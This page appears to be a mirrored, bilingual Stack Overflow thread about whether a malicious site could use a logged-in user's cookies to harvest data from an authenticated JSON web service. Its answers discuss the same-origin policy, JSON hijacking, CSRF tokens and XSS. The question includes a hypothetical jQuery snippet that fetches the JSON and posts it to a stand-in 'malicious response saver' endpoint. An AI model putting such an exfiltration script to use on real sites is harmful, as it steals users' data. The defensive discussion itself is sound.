保护受保护的 JSON Web 服务免遭数据收集?

发布于 2024-10-31 12:41:50 字数 581 浏览 5 评论 0原文

我们有一个 JSON Web 服务,我们的网页之一使用该服务来显示“实时”数据。要访问该页面,用户必须登录。我们担心恶意网站(竞争对手)获取此数据的能力。但是,我不确定我们预期的问题是否合理。

用户登录后,我们会在他们的计算机上存储一个“记住我”cookie。如果有人要构建一个网站,向我们的 Web 服务发出 AJAX 请求并说服登录用户访问该网站,他们是否能够从我们的服务中检索和存储信息?如果是这样,我们如何保护自己免受此类事件的侵害?

例如:

恶意网站是否可以构建这样的脚本来获取我们的数据:

$.post('their.secret.json', function(response) {
     $.post('our.malicious.response.saver', {save: response}, function(ourResponse) {
           alert('we saved your stuff!');
     }
});

既然他们正在访问我们的 JSON feed,它是否会将 cookie 发送到我们的网站并且用户将得到身份验证。既然要进行身份验证,那么敏感数据不会发回吗?

We have a JSON web service that is is used by one of our webpages to show "live" data. To get to the page, the user must be logged in. We are concerned about the ability of malicious sites (competitors) to harvest this data. However, I'm not sure if the problem we are anticipating is plausible.

Once a user is logged in, we store a "remember me" cookie on their machine. If someone were to build a site that made an AJAX request to our web service and convinced a logged in user to visit the site, would they be able to retrieve and store the information from our service? If so, how can we protect ourselves against something like that?

For example:

Could a malicious website build a script like this to get our data:

$.post('their.secret.json', function(response) {
     $.post('our.malicious.response.saver', {save: response}, function(ourResponse) {
           alert('we saved your stuff!');
     }
});

Since they are hitting our JSON feed, wouldn't it send the cookie to our site and the user would be authenticated. Since they would be authenticated, wouldn't it send back the sensitive data?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(2

森林很绿却致人迷途 2024-11-07 12:41:50

如果没有一些尚未修补的浏览器漏洞,您似乎担心的事情就无法完成。

另一个域上的脚本将无法向您的域发出 AJAX 请求。它也无法从您的域加载页面并“窃取”该信息。

就 CSRF 而言,您需要关注的是通过 GET 请求进行的破坏性操作,这当然根本不需要任何脚本。当然,所有这些都假设您的网站不易受到跨站点脚本攻击(这可能允许某人通过其他人的登录“窃取”数据)。

不过,我认为您更有可能遇到那些“挖掘”您的数据的“合法”用户的问题。不过,这更多的是业务层面的事情……除了确保适当的日志记录来识别此类情况之外。

Absent some as-yet-unpatched browser vulnerability, what you appear to be worried about can not be done.

A script on another domain will not be able to make AJAX requests to your domain. Nor can it load up a page from your domain and 'steal' that information.

What you do need to be concerned with as far as CSRF goes would be destructive actions via GET requests, which of course do not require any scripting at all. And all of this of course assumes that your site is not vulnerable to cross-site scripting (which could permit someone to 'steal' data via someone else's login).

I would think you would be much more likely to have problems with 'legitimate' users who are there to 'mine' your data, though. That's more of a business-level thing, though... aside from assuring proper logging to identify such situations.

窝囊感情。 2024-11-07 12:41:50

如果您担心攻击者能够使用合法用户的会话来检索 JSON 对象,那么您正在谈论 JSON 劫持。如果这种攻击可能发生,这取决于 JSON 文件的结构方式。请查找术语“JSON 劫持”以获取更多信息,或者随时发表评论,其中包含有关您的应用程序中有关 JSON 对象的更多详细信息。如果您发现自己容易受到攻击,添加 CSRF 令牌将有助于阻止任何 JSON 劫持攻击。

您还必须确保您的 Web 应用程序中不存在任何跨站脚本 (XSS) 漏洞。如果攻击者可以使用XSS,那么他就可以很容易地通过控制有效用户的浏览器来获取数据。在这种情况下,CSRF 令牌毫无用处。

If you are afraid that an attacker is able to use the session of a legitimate user to retrieve JSON-objects, you are talking about JSON-hijacking. It depends on the way your JSON-Files are structured, if such an attack is even possible. Look up the term "JSON hijacking" for further information or feel free to leave a comment with more details about your application concerning JSON-objects. If you find out that you are vulnerable, adding a CSRF-Token will help to shut down any JSON hijacking attacks.

You must also make sure that there is not a single Cross-Site Scripting (XSS) vulnerability in your web application. If an attacker can use XSS, it is rather easy for him to harvest data by controlling the browser of a valid user. CSRF-Tokens are useless in such a case.

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文